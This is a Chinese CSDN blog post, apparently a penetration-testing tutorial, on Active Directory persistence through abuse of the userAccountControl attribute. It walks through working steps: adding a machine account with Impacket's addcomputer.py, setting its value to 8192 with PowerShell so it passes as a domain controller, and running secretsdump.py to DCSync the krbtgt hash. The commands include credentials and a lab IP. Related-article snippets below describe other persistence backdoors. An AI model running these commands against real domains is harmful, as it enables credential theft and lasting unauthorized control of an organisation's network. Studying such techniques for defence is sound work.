域权限维持(UserAccountControl属性滥用)

最新推荐文章于 2024-05-23 19:20:49 发布
最新推荐文章于 2024-05-23 19:20:49 发布
阅读量296 收藏
点赞数 1
分类专栏: 域安全 文章标签: 网络安全 系统安全 安全 信息安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129837925
版权

文章目录

User-Account-Control(bf967a68-0de6-11d0-a285-00aa003049e2)简介
机器账户的User-Account-Control属性将其修改为8192,活动目录就会
认为这个机器账户是域控之后就可以进行Dcsync操作了,8192对应了
ADCS_UF_SERVER_TRUST_ACCOUNT微软标志位的解释是域中成员域控的机器账户。
微软文档地址:
https://learn.microsoft.com/en-us/windows/win32/adschema/a-useraccountcontrol

在这里插入图片描述
在这里插入图片描述

User-Account-Control(bf967a68-0de6-11d0-a285-00aa003049e2)利用
利用步骤简述:
	1.新增机器账户。
	2.通过域管或企业管理员对新增机器账户修改User-Account-Control值为8192(0x2000H)。
	3.通过新增机器账户进行Dcsync操作。
利用步骤1(Impacket):
	python3 addcomputer.py -computer-name 'hackmachine' -computer-pass 'Pass@123' -dc-ip 10.211.55.100 'test/yuguan:Password6666' -method SAMR -debug

在这里插入图片描述

利用步骤2(powershell):
	域空不需要安装普通成员机器需要安装
	Install-Module -Name ActiveDirectory -Scope CurrentUser
	修改属性
	$ADComputer= Get-ADComputer -Identity hackmachine
	Set-ADObject -Identity $ADComputer -Replace @{userAccountControl=8192}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用步骤3(Impacket):
	python3 secretsdump.py test/hackmachine$:Pass@123@10.211.55.100 -just-dc-user krbtgt

在这里插入图片描述

总结
User-Account-Control属性滥用可以将普通机器账户修改为称为域控,
并拥有Dcsync功能导出用户Hash,DCShadow是创建恶意域控然后利用
域控间正常同步数据的功能将恶意域控上的恶意对象同步到正在运行的
正常域控上。
虚构之人
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
AD中用户帐户属性userAccountControl
eNet
12-18 7975
AD中用户帐户属性userAccountControl 在打开用户帐户的属性后,单击帐户选项卡,然后选中或清除“帐户选项”对话框中的复选框,则会将数值分配给 UserAccountControl 属性。分配给该属性的值通知 Windows 已启用了哪些选项。下表列出了可以分配的标志。不能针对用户或计算机对象设置某些值,原因是这些值只能由目录服务设置或重置。若要禁用用户的帐户,请将
ADUserAccountControl属性、AD重要用户属性
热门推荐
本博客暂停使用
05-25 1万+
在修改AD用户状态的时候发现,UserAccountControl属性中启用和禁用账户的值会包含多个,需要整理全面一些,防止开发中写少了情况;整理重要用户属性是为了在开发中将HR系统用户有用信息存储到对应字段中,最终AD服务器可以用LDAP协议供其他平台作为账号验证中心!
内 dcsync 权限维持
最新发布
admin的博客
05-23 1181
DCSync 是渗透中经常会用到的技术,其被整合在了 Mimikatz 中。在 DCSync 功能出现之前,要想获得用户的哈希,需要登录控制器,在控制器上执行代码才能获得用户的哈希。该功能可以模仿一个控制器,从真实的控制器中请求数据,例如用户的哈希。该功能最大的特点就是不用登陆控制器,即可远程通过数据同步复制的方式获得控制器上的的数据。
权限维持思路总结
技术超强的网络安全平台
12-06 581
当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。Windows 操作系统常见持久性后门下面,我们先介绍几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划任务、Windows 新服务后门、WMI后门等等。Wind
怎么彻底关闭UAC(user account control)?
如沐清风的博客
05-24 7878
首先说一下UAC是什么? 说白了就是每次你对系统进行更改或者下载软件时,电脑总会问你,是否允许。。。?其实挺烦的,这就是UAC的作用。而且,有的软件要求你必须使用管理员权限,所以你每次允许此软件时都需要as adminstrator,实际上挺麻烦的,有的时候还会忘记。综上分析,我们可以知道UAC可以解决许多用户相关的问题。所以这里说一下怎么彻底的关闭UAC: 主要分为两步: 1.首先是 打开控制面板->用户账户->用户账户->更改用户账户控制设置 选择从不通知,点击确定 ..
相关基础知识
天在等我,菜鸟想飞
12-30 7604
基础知识 工作组(Work Group) 工作组是局网中的一个概念,由许多在同一物理地点,而且被相同的局网连接起来的用户组成的小组,也可以是遍布一个机构的,但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,加入工作组是为了区分用户计算机在网络中的类别,如果用户有工作组的话,在管理上会方便很多,可以共享/使用打印机和协和工作,很多小企业都是用这种方法来管理电脑,共享文件。 工作组环境中的登录验证过程:工作组网络也称为“对等式”的网
User Account Control
weixin_30312557的博客
02-23 161
User Account Control 编辑 本词条缺少名片图,补充相关内容使词条更完整,还能快速升级,赶紧来编辑吧! User Account Control (UAC :用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求所有用户在标准账号模式下运行程序和任务,阻止未认证的程序安装,并阻止标准用户进行不当的系统设置改变。 在最初的时候,这...
MVVM Usercontrol 依赖属性 前台后台双向数据绑定
05-15
4. 在主视图的XAML中,将视图模型的属性绑定到UserControl的依赖属性,设置Binding Mode为TwoWay。 通过以上步骤,你就可以创建一个具有双向数据绑定的MVVM Usercontrol。这种方式极大地提高了开发效率,减少了代码...
C# 使用委托方式Usercontrol与主窗体进行消息传递
04-25
在C#编程中,消息传递是UI组件之间通信的关键机制,特别是当我们在用户控件(UserControl)和主窗体(Form)之间需要交换数据时。本文将深入探讨如何使用委托(Delegate)来实现这一目标,确保代码的灵活性和可维护性。 ...
WPF自定义控件,UserControl的制作与使用过程
01-13
5. **属性和依赖项属性**:为了使UserControl更具可配置性,我们可以定义依赖项属性,比如颜色、大小等。这样,我们可以在使用UserControl的地方动态设置这些属性。例如,为椭圆添加一个可配置的填充颜色: ```...
渗透完全技巧.pdf
10-03
5. **权限维持**:一旦获取了权限,攻击者会部署后门,如利用信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还会使用各种技巧,如组策略Hook、PasswordChangeNotify、Kerberoasting后门等,...
ASP.NET UserControl 通信的具体实现
10-27
在ASP.NET开发中,UserControl是一种可重用的自定义控件,它允许开发者创建复杂的UI组件,以满足特定的需求。在某些情况下,特别是在构建大型Web应用程序时,UserControl之间的通信是必不可少的,比如在SharePoint ...
user account control用户帐户控制
hyp520520的博客
12-21 1691
UAC全称是User Account Control直译为“用户帐户控制”,是微软为提高系统安全而在Windows Vista中引入的新技术,VISTA以后的微软系统中都带有这个功能,如WIN7和WIN8系统中都有,UAC需要用户在执行一些可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。UAC 可以帮助防止恶意软件和间谍软件在未经许可的情况下在计算机上
如何使用UserAccountControl标志来操作用户帐户属性
coffee66666的博客
11-07 1050
总结 当您打开用户帐户的属性时,单击account选项卡,然后在帐户选项对话框中选择或清除复选框,数值将分配给UserAccountControl属性。赋给属性的值告诉Windows已经启用了哪些选项。 要查看用户帐户,单击“开始”,指向程序,指向管理工具,然后单击“活动目录用户和计算机”。 更多信息 可以使用ldap .exe工具或Adsiedit查看和编辑这些属性。msc咬合。 下表列出了可以...
Windows Vista for Developers——第四部分:用户帐号控制(User Account Control,UAC)
趁着年轻,希望我们不会让自己失望
05-05 1138
<br />Windows Vista for Developers——第四部分:用户帐号控制(User Account Control,UAC)<br />作者:Kenny Kerr<br />翻译:Dflying Chen<br />原文:http://weblogs.asp.net/kennykerr/archive/2006/09/29/Windows-Vista-for-Developers-_1320_-Part-4-_1320_-User-Account-Control.aspx<br />请
权限维持(重置DSRM密码与AdminSDHolder滥用)
qq_18811919的博客
03-25 713
本篇文章讲解内常见的权限维持手法的两种重置DSRM密码与AdminSDHolder滥用, 当然利用的姿势还有很多这里只是讲解了几种工具,下面我将写权限维持ACL滥用的 相关文章欢迎大家的支持。
权限维持(DCShadow)
qq_18811919的博客
03-21 306
本篇文章讲述了黄金票据+DCShadow以及psexec的相关利用, DCShadow是一种常见的维持手段是通过伪造成恶意DC进行, 同步进行进而权限维持
八.AD中启用用户和禁用用户
qq_38204532的博客
12-09 1041
c#LDAP代码实现启用账户或禁用账户
UAC(User Account Contro —— 用户帐户控制)
墨鱼菜鸡
11-10 234
今天补一下基础知识。 简介: 用户帐户控制(User Account Control,简写作UA C)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制,保护系统进行不必要的更改,提升操作系...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值